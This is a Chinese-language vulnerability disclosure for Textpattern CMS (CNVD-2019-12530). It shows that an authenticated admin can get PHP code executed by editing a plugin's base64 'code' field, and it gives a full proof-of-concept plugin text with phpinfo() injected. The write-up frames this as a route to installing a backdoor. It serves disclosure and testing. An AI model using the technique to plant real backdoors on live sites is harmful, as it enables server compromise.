该漏洞CNVD-ID: CNVD-2019-12530
漏洞提交CNVD后,待CNVD公示才发出本文。
测试环境:windows7 + firefox + Burpsuite + apache2 +php5.6.27 + mysql5.5.53
产品官网:https://textpattern.com/
github: https://github.com/textpattern/textpattern
系统安装环境要求:https://textpattern.com/about/119/system-requirements

一、漏洞分析

/textpattern/index.php?event=plugin 这里可以安装插件,这本是一个自带功能。但如果被恶意利用,则可以安装一个后门导致getshell。
/textpattern/lib/txplib_misc.php 文件中的function load_plugins()函数line 1870 这里会执行插件的代码。
将插件的code部分替换成后门代码后安装即可。

二、漏洞测试

需要登录管理后台。
官网下载任一插件
https://textpattern.org/plugins/1324/etc_search 这里选择etc_search作演示。

插件是一个文本文件,分两部分。
第一部分:前面有一段包含插件信息的标题(插件名称、版本和说明、作者名称等);第二部分:base64加密的代码和帮助。
复制所有base64加密的内容,进行解密。
比如这个网站可以解密:http://www.bejson.com/enc/base64/
将解密后的代码复制到notepad++中。
修改 s:4:"code";s:24918:"// TXP 4.6 tag registration……" (共计24918个字符),在notepad里位于第1行----558行。
修改为: s:4:"code";s:10:"phpinfo();";

修改前:
修改后:
将修改后的代码再进行base64加密。
复制新的base64加密内容替换原内容。
来到 /textpattern/index.php?event=plugin 页面安装插件。将处理过的内容粘贴到这里安装。
激活插件。
就可以在很多页面看到结果。
比如后台首页/textpattern/index.php ,或者前台首页。

三、POC

写入phpinfo()后的插件文本,可直接复制用于测试。

# Name: etc_search v0.9.5
# Type: Admin/Public plugin
# Search in any table(s)
# Author: Oleg Loukianov
# URL: http://www.iut-fbleau.fr/projet/etc/
# Recommended load order: 7# .....................................................................
# This is a plugin for Textpattern CMS - http://textpattern.com/
# To install: textpattern > admin > plugins
# Paste the following text into the 'Install plugin' box:
# .....................................................................a:11:{s:4:"name";s:10:"etc_search";s:6:"author";s:14:"Oleg Loukianov";s:10:"author_uri";s:36:"http://www.iut-fbleau.fr/projet/etc/";s:7:"version";s:5:"0.9.5";s:11:"description";s:22:"Search in any table(s)";s:4:"code";s:10:"phpinfo();";s:4:"type";s:1:"1";s:5:"order";s:1:"7";s:5:"flags";s:1:"3";s:4:"help";s:13136:"<h3>Description</h3>

	<p>This plugin displays a search form similarly to <code>&lt;txp:search_input /&gt;</code>. If Javascript is enabled, a results list will fade in and resize in real time below the search box with a nice animation effect as the user types his query. When the search box is empty, the results list shrinks and fades out.</p>

	<p>The search is advanced, i.e. "jaguar speed -car" will display the results containing the strings "jaguar" and "speed", but not "car". The syntax is customizable by modifying <code>Search settings</code> JSON encoded preference. Moreover, you can instruct the plugin to do faceted searches and query any fields in your txp database.</p>

	<p>When the user hits the Enter key he gets redirected to a traditional search results page, so the plugin also degrades nicely in non-Javascript browsers.</p>

	<p>Nearly everything (input form, output form, animation, search query) is customizable. Moreover, you can use <code>etc_search</code> to query your txp database without user interaction, extending the capabilities of <code>article_custom</code> and other list tags..</p>

	<h3>Requirements</h3>

<p>The plugin is composed of two files: <code>etc_search.txt</code> and <code>livesearch.jquery.js</code>. The first one is compressed <code>php</code> file to be installed as usual in <code>Plugins</code> tab. On install it will create a <code>etc_search</code> table and two preferences that will be removed on uninstall. It will also create an article form (that you can modify) named <code>etc_search_results</code> that will be used as default live search output.</p>

	<h4>Javascript</h4>

	<p>jQuery <strong>1.2</strong> or more recent is required.</p>

	<p>You can use the <code>jquery.js</code> javascript file which is bundled with Textpattern and you need to upload the provided <code>livesearch.jquery.js</code> file to your web server (for example in a folder called &#8220;/js/&#8221;) and include both of these files in the header of the web pages where you want to use the plugin:</p>

<pre><code>&lt;script type=&quot;text/javascript&quot; src=&quot;textpattern/jquery.js&quot;&gt;&lt;/script&gt;
&lt;script type=&quot;text/javascript&quot; src=&quot;js/livesearch.jquery.js&quot;&gt;&lt;/script&gt;
</code></pre>

	<h3>Syntax</h3>

<h4>Input form/live search</h4>
<pre><code>&lt;txp:etc_search /&gt;
</code></pre>
<p>or as container:</p>
<pre><code>&lt;txp:etc_search&gt;
  &lt;input name="a" /&gt;
  &lt;input name="b" /&gt;
  ...
&lt;/txp:etc_search&gt;
</code></pre>

<h4>Output results</h4>
<pre><code>&lt;txp:etc_search_results /&gt;
</code></pre>
<p>or as container:</p>
<pre><code>&lt;txp:etc_search_results&gt;
  output pattern
&lt;txp:else /&gt;
  &lt;txp:text item="no_search_matches" /&gt;
&lt;/txp:etc_search_results&gt;
</code></pre>

	<h3>Attributes of <code>etc_search</code> tag</h3>

	<h4>Required</h4>

	<p>none.</p>

	<h4>Optional</h4>

	<ul>
		<li><strong>id</strong>: Comma-separated list of query identifiers (see below), default is <code>0</code> (default search).</li>
		<li><strong>live</strong>: Milliseconds of user inactivity before live search starts, <code>600</code> by default. Set it to <code>0</code> to disable the live search, or to <code>-600</code> to make the results persist on the screen even after loosing the focus.</li>
		<li><strong>minlength</strong>: Minimal length of user input before live search starts, <code>1</code> by default.</li>
		<li><strong>match</strong>: Search mode, set it to <code>exact</code> if necessary.</li>
		<li><strong>format</strong>: Allows to glue multiple URL <code>{variables}</code> (generally produced by <code>&lt;txp:etc_search /&gt;</code> used as container) into one search string. For example, <code>format="{q} @{c}"</code> will pass the string <code>?c=tips&q=pag&...</code> as "pag @tips" search query to <code>etc_search</code>. Default is <code>{q}</code>, the value of txp search string parameter.</li>
		<li><strong>action</strong>: URL of the page to redirect the user to when he hits the Enter key, in order to display the standard search results page. Default is the home page.</li>
		<li><strong>html_id</strong>: <span class="caps">HTML</span> <code>id</code> attribute that will be applied to the search form. Default is <code>live_search_[some_random_id]</code>.</li>
		<li><strong>class</strong>: <span class="caps">HTML</span> <code>class</code> attribute of the search form, <code>ls_search</code> by default.</li>
		<li><strong>target</strong>: jQuery selector, set it if you want to display live search results elsewhere.</li>
		<li><strong>form</strong>: Optional Textpattern form for live search results output.</li>
		<li><strong>label</strong>: Displays a label above the search box with the specified text. Default is &#8220;search&#8221; string localized in the language of your Textpattern installation.</li>
		<li><strong>size</strong>: Size of the search box (number of characters).</li>
		<li><strong>placeholder</strong>: Invitation text that will de displayed in the box. This text disappears when user has typed something into it. Default is empty.</li>
		<li><strong>limit</strong>: Maximum number of results in the live results list. Default is <code>0</code> (no limit).</li>
		<li><strong>wraptag</strong>: <span class="caps">HTML</span> tag to wrap the search results with, inside the form. Default is empty.</li>
		<li><strong>break</strong>: <span class="caps">HTML</span> tag to be used for line breaks in the content inside the live results list, without brackets. Default is <code>br</code>.</li>
	</ul>

<h3>Admin-side settings</h3>

<p>Go to <code>Extensions/etc_search</code> to change them.</p>

<h4>Search settings</h4>
<ul>
<li><strong>Logical operations</strong>: JSON-encoded object containing MySQL operators to be used in search queries.</li>
</ul>

<h4>Search forms</h4>
<ul>
<li><strong>context</strong>: One of <code>article | file | image | link</code>, representing the table to search in, or <code>custom</code>. If not custom, you can use (some of) context tags in forms, see below.</li>
		<li><strong>query</strong>: A string patterns representing a valid MySQL SELECT query, with specially crafted WHERE clause. It is of the form <code>SELECT ... WHERE {[?param::]match1;match2;...} AND/OR other_criteria ...</code>. The <code>{match}</code> token will be replaced by the plugin with appropriate string. A query pattern can be reduced to <code>{match1;match2;...} ...</code> if some non-custom context is set.<br />
Here <code>param</code> is a url variable to be used in the item. If omitted, the default search parameter <code>q</code> will be used.<br />
Each <code>match</code> item is a string <code>fields::pattern::condition</code>, where
<ul>
<li><code>fields</code> is a comma-separated list of db fields;</li>
<li><code>pattern</code> is a regexp to match search query against, <code>/^.+$/s</code> (any query) by default;</li>
<li><code>condition</code> is a MySQL WHERE clause (its default value is <code>{*} LIKE %search_term%</code>) to filter <code>fields</code> with. Here,  the <code>{*}</code> token will be replaced by <code>fields</code> names, and <code>$n</code> tokens will be taken from search queries matching <code>pattern</code>.</li>
</ul>
		<li><strong>form</strong>: Two output forms to use for displaying the results, in live and standard mode. If empty, will be assigned the value of <code>etc_search_results, search_results</code>.</li>
<li>Finally, <strong>content</strong> consists of two output patterns where all occurrences of <code>{field}</code> will be replaced by the corresponding (escaped) field value. The first pattern will be used for the live search, the second one for the standard search.</li></ul>
</li>
</ul>

	<h3>Examples</h3>
<p>By default, <code>etc_search</code> acts like the built-in Textpattern search, querying articles <code>Title</code> and <code>Body</code>. If you want to make searchable also <code>Keywords</code> and <code>Excerpt</code>, create an article query <code>{Title,Body,Keywords,Excerpt}</code> (say, number 1), and call</p>
<pre><code>&lt;txp:etc_search id="1" /&gt;</code></pre>

<p>Suppose now that you wish to extend the default Textpattern search with faceted search for some text in images <code>caption</code> attribute, and display the titles of the articles which are associated (via Article image) with the matching images. To indicate that you are searching in captions, you decide to prefix terms by <code>cap:</code>. Then you can create the following article context query (say, number 2) and forms:</p>

<pre><code>query: SELECT txp.*,img.caption FROM textpattern txp JOIN txp_image img ON FIND_IN_SET(img.id,txp.Image) WHERE {img.caption::/^cap:(.+)$/::{*} LIKE '%$1%'}
live form: &lt;a href='&lt;txp:permlink /&gt;' title='{caption}'&gt;&lt;txp:title /&gt;&lt;/a&gt;
static form: &lt;h3&gt;&lt;txp:permlink&gt;&lt;txp:title /&gt;&lt;/txp:permlink&gt;&lt;/h3&gt;&lt;txp:excerpt /&gt;
</code></pre>
 <p>and use <code>&lt;txp:etc_search id="0,2" /&gt;</code>.</p>

<h3>The <code>etc_search_results</code> tag</h3>

<p>You can replace the default (non-live) TXP search with <code>&lt;txp:etc_search_results /&gt;</code> by placing this tag instead of <code>&lt;txp:article /&gt;</code> in <code>if_search</code> section of your pages. The tag currently accepts the standard <code>html_id</code>, <code>form</code>, <code>wraptag</code>, <code>break</code> and <code>limit</code> attributes. If <code>form</code> or <code>content</code> are set, they will be common to all search queries, overwriting their own forms.</p>

<p>The <code>id</code> attribute allows to restrict search to a list of comma-separated search form ids. If this list is preceded by <code>-</code>, the corresponding forms will be excluded. You can place two or more mutually exclusive <code>&lt;txp:etc_search_results /&gt;</code> tags on the page:</p>
<pre><code>&lt;txp:etc_search_results id="1,2" form="form1" /&gt;
&lt;txp:etc_search_results id="3" form="form2" /&gt;
</code></pre>

<p>The <code>query</code> attribute allows to pass a search string directly to <code>&lt;txp:etc_search_results /&gt;</code>. For example, <code>query="red blue"</code> will be treated as <code>?q=red+blue</code> and output (with the default search) all the articles containing both "red" and "blue". This allows to use <code>&lt;txp:etc_search_results /&gt;</code> as <code>&lt;txp:article_custom /&gt;</code> with very customizable <code>where</code> attribute.</p>

<h3>The <code>etc_search_result_excerpt</code> tag</h3>

<p>You can also replace <code>&lt;txp:search_result_excerpt /&gt;</code> with <code>&lt;txp:etc_search_result_excerpt /&gt;</code> where appropriate. It accepts some additional attributes:</p>
<ul>
<li><code>type="article"</code>;</li>
<li><code>field="body"</code>;</li>
<li><code>size="50"</code>: the maximum number of surrounding characters;</li>
<li><code>showalways="0"</code>: show an excerpt even if there is no match.</li>
</ul>


<h3>The <code>etc_search_result_count</code> tag</h3>
<p>Accepts only <code>text</code> attribute. The tokens <code>{from}, {to}, {total}, {page}, {pages}</code> therein will be replaced by corresponding values, to display a string like <code>Results 6 to 10 of 27</code>.</p>

	<h3><span class="caps">CSS</span>Styling</h3>

	<p>The live search consists of a form with the <code>id</code> attribute value set by the &#8220;html_id&#8221; parameter. This form contains two zones. You can style any element by referencing the id attribute of the form and the <span class="caps">CSS</span> class of the element (or its tag) in your <span class="caps">CSS</span>.</p>

	<h4>The search zone</h4>

	<p>The first zone is a block with the applied class &#8220;ls_search&#8221; which contains: the optional label (followed by a line break if defined) and the text input box. The tag of this block is defined by the &#8220;wraptag&#8221; parameter (default is <code>div</code>).</p>

	<p>The default search box is an input tag. If you want, you can style it using a <span class="caps">CSS</span> rule like this one:</p>

<pre><code>#live_search input {
    font-size: 10px;
    color: #000;
}
</code></pre>

	<h4>The results zone</h4>

	<p>The results zone is a <code>div</code> block with the class &#8220;ls_search&#8221;, containing the results list. You can choose to position this block absolutely, or even replace it with any block, setting <code>target</code> attribute.</p>

	<p>If you are not happy with the default animation, unbind <code>update.html_id</code> event of the <code>target</code> and replace them with your own jQuery animations. You can also set <code>start</code> and <code>stop</code> events, fired at the beginning and the end of live AJAX requests.</p>

	<p>The content of the results block will be either:</p>

	<ol>
		<li><em>At least one result is found:</em> A list with wrap and break tags according to your &#8220;wraptag&#8221; and &#8220;break&#8221; parameters (see above).</li>
		<li><em>No results found:</em> The localized &#8220;no_search_matches&#8221; message.</li>
	</ol>";s:3:"md5";s:32:"7e2940921cff6e49b7a0fc84d3ca55ca";}

TextpatternCMS安装插件时可以安装后门导致getshell相关推荐

  1. 解决WordPress博客安装插件时提示输入FTP用户名和密码的问题

    http://www.lajiz.cn/1310.html 自从垃圾站博客从电信通搬家到万网虚拟主机后,总是出现问题,刚开始是万网M3主机禁用mail()函数导致WordPress博客无法发送评论回复 ...

  2. java插件怎么安装不了_java-尝试安装插件时出错

    java-尝试安装插件时出错 我正在尝试在Eclipse Luna中安装插件. 我安装了Papyrus,并尝试安装SWT Designer,但是在完成下载/安装之前,我得到了一个错误: An erro ...

  3. VirtualBox安装centos7时无法安装问题

    VirtualBox安装centos7时无法安装的问题 主要是电脑硬件不支持虚拟化而引发的问题. 解决方案:win10开机按esc或F1或F2(不同的电脑不一样)进入BIOS系统,其他设置不要更改,找 ...

  4. 安装w3af时已经安装retire却提示没有安装的问题

    安装w3af时已经安装retire却提示没有安装的问题 问题描述 问题分析 解决方案 问题描述 在kali下安装w3af,运行完/tmp/w3af_dependency_install.sh,此时接着 ...

  5. 安装CAD时提示“安装错误1603的解决办法

    安装AutoCAD的时候,出现致命错误,提示1603错误,如下图所示,应该如何解决 安装CAD时提示"安装错误1603:安装期间出现致命错误" 出现这个问题,可尝试一下方法解决 1 ...

  6. 在Chrome离线安装插件时显示程序包无效: CRX_HEADER_INVALID

    问题描述: 看有教程说,在chrome安装离线插件(.crx格式),只需要把crx文件拖动到扩展程序列表(chrome://extensions/)就可以了,但是我在操作时遇到以下问题:程序包无效:& ...

  7. FireFox浏览器安装插件时提示:“该附加组件无法安装,因为它有可能已损坏”

    当我想为FireFox浏览器安装一个selenium插件时,提示我文件可能损坏了无法安装 解决方案如下: 1.重新打开一个FireFox浏览器,输入about:config,此时会提示风险,点击接受风 ...

  8. Eclipse中安装插件时提示:No repository found containing: osgi.bundle,org.eclipse.emf,2.8.0.v20180706-1146

    场景 在Eclipse中安装ERMaster时提示: No repository found containing: osgi.bundle,org.eclipse.emf,2.8.0.v201807 ...

  9. dz手机版空白显示index.php,discuz x3.3安装插件时页面出现空白有两种解决方法

    一.下载你所用的discuz程序版本的function_cloudaddons.php覆盖一下就可以恢复 解决DiscuzX3.1 X3.2安装插件空白 第一步:把你所对应的安装包版本解压一下到桌面. ...

  10. anacoda里面安装包显示失败_VScode离线安装插件,以及安装插件失败问题

    一直使用VScode,所以在新项目中,领了虚拟机之后,依然使用VScode,但是VScode安装的只是一个工具,里面没有任何插件,没有插件怎么办公啊,所以只能自己安装离线插件了,找了很多方法,终于安装 ...

最新文章

  1. CustomValidator验证控件的ServerValidate事件
  2. python程序实例源代码-python实例-兔子和獾(塔防游戏)附源码
  3. 新型冠状病毒肺炎国内分省分日期从1.16起的全部数据爬取与整理代码(附下载)
  4. java两个二进制数求和,Leetcode 67:Add Binary(二进制求和)
  5. 是不是人老了,子女都不愿和老人相处?
  6. python实现人脸检测及识别(2)---- 利用keras库训练人脸识别模型
  7. 从inceptionv1走向xception小结
  8. hdu4521 线段树+dp
  9. Linux设备驱动开发详解
  10. 微信小程序实战十一:uni中集成ocr身份证识别功能
  11. 交互设计师谈颠覆式创新 | Think different
  12. win10 蓝牙耳机已连接但是耳机仍没有声音,音频仍是扬声器输出问题的出现条件及解决方案
  13. html画流程图插件,基于SVG的流程图插件Flowchart.js
  14. 在小公司做项目经理有意义吗_产品经理–是否具有战略意义?
  15. python学习需要多久?三个月够吗?
  16. 【IoT】产品设计:硬件产品外观样品设计工艺及要求(手板)
  17. Uniapp URL地址栏获取指定参数
  18. 数据结构ADT是什么
  19. 《Unsupervised Learning of Depth and Ego-Motion from Video》读书笔记
  20. CRUX下实现进程隐藏(1)

热门文章

  1. 已解决:不小心卸载pip后(重新安装pip的两种方式)
  2. 如何查看Linux虚拟机ip地址
  3. gtp传输java_一种GTP数据包传输方法、相关装置及存储介质与流程
  4. 词法分析之LED文件批量生成
  5. Linux | 如何通过Xshell上传文件到Linux
  6. Visual Odometry
  7. html 模拟鼠标移动,如何在网页端用js模拟鼠标移动点击等操作
  8. Bandicam录制时未响应-视频MP4文件损坏修复办法
  9. C语言实现99乘法表
  10. 基于决策树模型对 IRIS 数据集分类